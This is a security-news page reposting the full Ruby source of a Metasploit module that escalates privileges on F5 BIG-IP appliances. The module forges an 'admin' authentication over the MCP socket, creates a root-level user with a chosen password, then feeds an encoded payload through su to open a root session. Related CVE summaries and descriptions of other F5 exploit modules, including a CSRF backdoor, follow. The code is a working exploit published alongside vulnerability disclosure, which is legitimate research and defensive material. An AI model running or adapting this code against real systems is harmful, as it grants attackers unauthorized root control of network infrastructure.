Security
Headlines
HeadlinesLatestCVEs

Headline

F5 Big-IP Create Administrative User

This Metasploit module creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways.

Packet Storm
#vulnerability#linux#git#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'unix_crypt'class MetasploitModule < Msf::Exploit::Local  include Msf::Post::Linux::F5Mcp  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'F5 Big-IP Create Admin User',        'Description' => %q{          This creates a local user with a username/password and root-level          privileges. Note that a root-level account is not required to do this,          which makes it a privilege escalation issue.          Note that this is pretty noisy, since it creates a user account and          creates log files and such. Additionally, most (if not all)          vulnerabilities in F5 grant root access anyways.          Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb        },        'License' => MSF_LICENSE,        'Author' => ['Ron Bowes'],        'Platform' => [ 'unix', 'linux', 'python' ],        'SessionTypes' => ['shell', 'meterpreter'],        'References' => [          ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],          ['URL', 'https://support.f5.com/csp/article/K97843387'],        ],        'Privileged' => true,        'DisclosureDate' => '2022-11-16',        'Arch' => [ ARCH_CMD, ARCH_PYTHON ],        'Type' => :unix_cmd,        'Targets' => [[ 'Auto', {} ]],        'Notes' => {          'Stability' => [],          'Reliability' => [],          'SideEffects' => []        }      )    )    register_options([      OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]),      OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]),      OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),    ])  end  def exploit    # Get or generate the username/password    fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?    username = datastore['USERNAME']    if datastore['CREATE_SESSION']      password = Rex::Text.rand_text_alphanumeric(12)      new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)      print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session")    else      password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)      print_status("Will attempt to create user #{username} / #{password}")    end    # If the password is already hashed, leave it as-is    vprint_status('Hashing the password with SHA512')    hashed_password = UnixCrypt::SHA512.build(password)    if !hashed_password || hashed_password.empty?      fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')    end    # These requests have to go in a single 'session', which, to us, is    # a single packet (since we don't have AF_UNIX sockets)    result = mcp_send_recv([      # Authenticate as 'admin' (this probably shouldn't work but does)      mcp_build('user_authenticated', 'structure', [        mcp_build('user_authenticated_name', 'string', 'admin')      ]),      # Start transaction      mcp_build('start_transaction', 'structure', [        mcp_build('start_transaction_load_type', 'ulong', 0)      ]),      # Create the role mapping      mcp_build('create', 'structure', [        mcp_build('user_role_partition', 'structure', [          mcp_build('user_role_partition_user', 'string', username),          mcp_build('user_role_partition_role', 'ulong', 0),          mcp_build('user_role_partition_partition', 'string', '[All]'),        ])      ]),      # Create the userdb entry      mcp_build('create', 'structure', [        mcp_build('userdb_entry', 'structure', [          mcp_build('userdb_entry_name', 'string', username),          mcp_build('userdb_entry_partition_id', 'string', 'Common'),          mcp_build('userdb_entry_is_system', 'ulong', 0),          mcp_build('userdb_entry_shell', 'string', '/bin/bash'),          mcp_build('userdb_entry_is_crypted', 'ulong', 1),          mcp_build('userdb_entry_passwd', 'string', hashed_password),        ])      ]),      # Finish the transaction      mcp_build('end_transaction', 'structure', [])    ])    # Handle errors    if result.nil?      fail_with(Failure::Unknown, 'Request to mcp appeared to fail')    end    # The only result we really care about is an error    error_returned = false    result.each do |r|      result = mcp_get_single(r, 'result')      result_code = mcp_get_single(result, 'result_code')      # If there's no code or it's zero, just ignore it      if result_code.nil? || result_code == 0        next      end      # If we're here, an error was returned!      error_returned = true      # Otherwise, try and get result_message      result_message = mcp_get_single(result, 'result_message')      if result_message.nil?        print_warning("mcp query returned a non-zero result (#{result_code}), but no error message")      else        print_error("mcp query returned an error message: #{result_message} (code: #{result_code})")      end    end    # Let them know if it likely worked    if !error_returned      print_good("Service didn't return an error, so user was likely created!")      if datastore['CREATE_SESSION']        print_status('Attempting create a root session...')        out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}")        vprint_status("Output from su command: #{out}")      end    end  endend

Related news

CVE-2022-41622

In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVE-2022-41800

In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

F5 BIG-IP iControl Remote Command Execution

This Metasploit module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. Successful exploitation results in remote code execution as the root user.

F5 BIG-IP iControl Remote Command Execution

This Metasploit module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. Successful exploitation results in remote code execution as the root user.

F5 BIG-IP iControl Cross Site Request Forgery

This Metasploit module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.

F5 BIG-IP iControl Cross Site Request Forgery

This Metasploit module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.

High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems. Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints. The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems. Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints. The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution